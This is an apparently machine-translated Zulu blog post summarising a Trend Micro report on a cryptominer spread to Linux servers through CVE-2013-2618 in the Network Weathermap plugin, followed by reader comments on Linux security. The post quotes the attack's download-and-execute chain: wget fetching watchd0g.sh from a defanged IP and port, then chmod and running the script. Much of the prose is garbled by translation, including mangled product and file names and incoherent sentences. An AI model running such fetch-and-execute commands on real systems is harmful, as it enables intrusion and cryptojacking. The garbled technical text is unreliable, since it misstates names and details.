Lokhu kusuka umvukuzi we-cryptocurrency ngokusebenzisa amakhompyutha akude ngaphandle kwemvume yabanikazi balaba iba yinjwayelo. Bengivele ngikhulume ngalokhu ezikhathini ezimbalwa lapha kubhulogi ngalolu hlobo lwesimo.
Futhi ukuthi lokhu sekuvele kungasalawuleki ngokuphelele kusukela lapho ama-cryptocurrensets bathathe indawo nenani elikhulu impela, abantu abanolwazi olwanele lokuthola amakhompyutha aphula ukuphepha kwabo babeka eceleni ukuchitha isikhathi befuna imininingwane ebalulekile noma ama-akhawunti asebhange ukuze bathole inzuzo yemali.
Esikhundleni sokwenza lokhu, bakhetha into elula ekuphatheni la maqembu nokuwahlanganisa kwinethiwekhi yezimayini nakwiminye imisebenzi ejwayele ukuyenza nge-botnet.
Ngale ndlela imvamisa kukuphinda ukhethe kabusha igama lakho, babheke kuphela emalini esheshayo etholwa yilokhu.
Ngokuqonda okuhle kwezitayela zemakethe nolwazi olufanele lokuhweba nge-crypto, umuntu angathola izinzuzo ezinkulu.
Ingabe i-Linux uhlelo oluvikelekile ngempela?
Abaningi bethu banomqondo wokuthi iLinux uhlelo olusebenzayo oluphephe ngokuphelele, iqiniso ukuthi kusenamaphutha athile.
Well uyeezinye izinsuku iTrendMicro ithole okutholakele, lapho kwembuliwe okusha iphutha ezinhlelweni zeLinux ezinikeze kubaduni inzuzo yezimayini ze-cryptocurrensets usebenzisa amaseva we-Linux nemishini.
Esitatimendeni ngebhulogi yakho baphawule ngokulandelayo:
Ngokuqapha kwethu okuhlobene nokuphendula kwezehlakalo, sabona imizamo yokungena ngaphakathi izinkomba zayo esikwazile ukuzihlanganisa nomkhankaso wangaphambilini wezimayini ze-cryptocurrency owawusebenzisa i-malware yeJenkinsMiner.
Umehluko: lo mkhankaso ubheke amaseva we-Linux. Futhi kuyicala lakudala lokuba sengozini okusetshenziswe kabusha, kuxhashazwa iphutha elaphelelwa yisikhathi i-patch yalo etholakale cishe iminyaka emihlanu.
Kulokhu kukhululwa ngokuhlaziywa kwakho ikwazile ukubona izindawo ezithintekile kulokhu kwehluleka lokho Kuthinta kakhulu iJapan, iTaiwan, iChina, i-USA kanye ne-India.
Ukuhlaziywa kokuhlaselwa
Ngokuhlaziya ngohlelo lweTrend Micro Smart Protection Network imininingwane kancane yokuthi abahlaseli balisebenzisa kanjani leli phutha:
Abasebenza kulo mkhankaso babexhaphaza i-CVE-2013-2618, ubungozi besikhathi ku-plugin yeCamapi Network Weathermap, abaphathi bohlelo abayisebenzisayo ukubona umsebenzi wenethiwekhi.
Mayelana nokuthi kungani basebenzisa iphutha elidala lokuphepha: I-Network Weathermap inezimbiwa ezimbili kuphela ezibikwe esidlangalaleni kuze kube manje, zombili kusukela ngoJuni 2014.
Laba bahlaseli kungenzeka ukuthi basebenzisa hhayi kuphela iphutha elikhona kwezokuphepha lapho kutholakala khona ukuxhashazwa kodwa futhi nokulibaziseka kwepatch okwenzeka ezinhlanganweni ezisebenzisa ithuluzi lomthombo ovulekile.
Ngokuyisisekelo ukuhlaselwa kungokuhlaselwa kwe-XSS:
Ingxenye eyindidane ilitshe lokuhlasela, iseva yewebhu ethekwini.
Ifayela /plugins/weathermap/configs/conn.php yifayela elivela ekuhlaselweni okuqhubekayo kwe-XSS ku / ama-plugins / imephu yesimo sezulu / php .
Ngaphezu kwalokho conn.php Ekuqaleni, sibona isicelo esifanayo se-HTTP sisetshenziswa ekhasini elibizwa ngokuthi ' kuyabanda.php '.
Uhlelo lwezimayini ze-cryptocurrency lusatshalaliswa ngobungozi kusuka kumephu yesimo sezulu se-PHP kuzinkomba ezingamaseva we-Linux
Emfanekisweni ungabona ukuthi ukuhlasela kwenziwa kanjani futhi kuchazwa kanjena:
wget watchd0g.sh hxxp: // 222 [.] 184 [.]] 79 [.] 11: 5317 / watchd0g [.] sh
Okwenzayo ukuthumela inkomba yokulanda ifayili nge-wget, okuyinsiza yokuthi cishe konke ukusatshalaliswa kwe-Linux kufakwe ngokuzenzakalela.
chmod 775 watchd0g.sh
yenza ifayili lisebenze
./watchd0g.sh
Okwenzayo ekugcineni ukuthola ukuthi ifayili lisebenze kuseva.
Ngenhlanhla sekuvele kukhona isichibi ( I-CVE-2013-2618 ) kutholakala ukwehluleka futhi Ungayilanda funa lesi sixhumanisi
Si ufuna ukwazi kabanzi ngayo lokhu kwehluleka ungavakashela lesi sixhumanisi.
Umthombo: I-Cryptocurrency Miner Isatshalaliswa nge-PHP Weathermap Vulnerability, I-Tarvers Linux Servers
Ukuba yisilima akuphephile, futhi ngaphandle kwalokho iLinux iyakusindisa.
Ukungavuseleli amabala okuphepha akulona iphutha le-Linux. Kuyiphutha ukuthi ezinye izinkampani, ukonga imali, ziqashe izilima njengabaphathi bohlelo,
Kepha noma kunjalo, KUTHOLAKALA NGOKUSHESHA futhi ixazululwe khona manjalo, noma ngabe yisiphi isigameko sokuphepha esincane esifana nalesi siyashicilelwa.
Futhi yiliphi iphutha i-Linux enalo lokuthi izibuyekezo zalo azisebenzi? Abathuthukisi be-GNU / Linux benza umsebenzi wabo ngokwenza izixazululo zokuba sengozini okuvelayo nokubenza batholakale kubasebenzisi. Uma udokotela ekunika umuthi wokugomela umkhuhlane kodwa ungawutholi, uyagula futhi uqine… ngabe yiphutha likadokotela?
DesdeLinux Akukona lokho okwakuyikho, izindaba ezimbili zilandelana ezinamaphutha amabili abalulekile:
1.- Kubahleli abangcono bokuthuthuka babeka eyodwa engeyona isoftware yamahhala futhi bakhohlwe ezinye eziyizo (zikhonjisiwe kumazwana).
2.- Izindaba ezimangazayo ngamagciwane uma athinta kuphela amaseva ANGABUYEKEZI. Kepha uma kukhona i-linux ebuyekezwe ngokuzenzakalela amashumi eminyaka. Ukubeka ukwesaba sengathi kudingeka i-antivirus yesitayela seWindows. Kubonakala sengathi bazama ukusho ukuthi iLinux iyafana neWindows hhayi.
Uma isinambuzane sigugile futhi sesivele simakiwe, akusona izindaba noma lutho. Ungadlali izinkampani zeMicrosoft nezama-antivirus njengeTrend Micro, iNorton, iPanda noma iMcAffee, noma ukhokhelwe.
Ngale ndlela, besisebenzisa iTrend Micro iminyaka eminingana kule nkampani futhi bekuyizambane langempela, isichitho, ngoba uhlelo lwayo luthi ophumelelayo "unemikhondo" yamagciwane (into engaba yigciwane, noma ngabe not) nokuthi kungani yayisusa (yayiyisa enkombeni ukuze ingasebenzi) ingavumeli ukusetshenziswa kwayo, futhi yayingenalo uhlu olumhlophe lokuvula lokhu kuziphatha ngefayela eliphephile elisebenzisekayo ebesilidinga ukulisebenzisa. Hamba shit. Kwakuyinguqulo yebhizinisi, inguqulo ngayinye ibinethuba lokugunyazwa. Ukuzwela.
Ungazichazi kahle kangaka.
I-athikili ikhuluma ngomgodi wokuphepha okuvumela ukuthi ungene kuhlelo, ulwenze lusebenze futhi uluqhube, okuyimbobo yokuphepha okudingeka ukuthi igciwane ngalinye lisabalale, kusobala ukuthi liyigciwane elizodinga ukuthi uhlelo lufakwe ukuze lube nekhodi yalo ukubakhona kwamakhompyutha okuskena kunethiwekhi ukuphinda ukusebenza nokuzikopisha. Abakwenzi kahle lokhu ngoba kwiLinux izimbobo zokuphepha ezitholakele zimbozwe isichibi sokuphepha, futhi yilokho engikushoyo ngomehluko phakathi kweWindows neLinux, ngoba i-antivirus ayidingekile, kepha ukumboza umgodi. Ku-Windows kunzima kakhulu ngezizathu eziningana: 1.- Amafayela angasebenza kalula ngokwandiswa kwawo, kususwe isinyathelo sokwethulwa kwawo kukhompyutha ethintekile. Abasebenzisi baqhubeka ngokufaka izinhlelo ezinomsuka wokungabaza ngoba banobunikazi futhi badinga ukuba nabo ngaphandle kokukhokha (angisho lutho ukuthi kungaba yini ngomnotho wasekhaya ukuthenga i-MS Office, i-Photoshop, ... ngaphezu kokuphinda kabili izindleko zemishini yekhompyutha). 2.- Ngokushesha noma kamuva iWindows izoflasha, umsebenzisi ayise kumakhelwane, umngani, ... okuthi, ukuze angachithi isikhathi, afomathile konke futhi afake okokugcina kweWindows ngesiqephu sokuvula esingavuselelwa noma leso isichibi uqobo sifaka uhlelo lwezinhloli. Kungenzeka ukuthi ayikho futhi iyahamba kahle, kepha kungenzeka ukuthi ikhona futhi inezinhloli zeWindows kumaphasiwedi. Esihlokweni bakhuluma ngohlelo lokungeniswa ku-linux ethinteke ukuba sengozini, okwenza uhlelo oluhlola ngokuzenzakalela inethiwekhi bese luyisebenzisela ukuzikopisha nokusebenzisa kuseva luyingxenye elula kunazo zonke, ngenxa yalesi sizathu lokho okushiwo i-athikili yisinyathelo esibaluleke kakhulu kunoma yiliphi igciwane: ukwazi ukuba sengozini kohlelo lokuhlasela.
Imininingwane emibi. Lesi akusona isinambuzane ku-Linux, yisiphazamisi ku-PHP APPLICATION, okusho ukuthi, yiplatform. Akukhethi ngisho nezinhlelo ezisebenzisa i-linux kernel! Kepha noma ngabe uhlelo lokusebenza belungeyona ipulatifomu, bekungeke kube yisiphazamisi se-Linux, kungaba uhlelo lokusebenza nje.
I-Linux kernel ayinakho ukuphazamiseka okuncane ekuvikeleni ekuhlaselweni kwe-cross-site scripting njengale. Okungenani phenya IMIZUZWANA EMIHLANU ngaphambi kokuthumela ngoba iqiniso lokuthi kunoma ngubani owazi okuncane ngokuthize, uzobukeka umubi.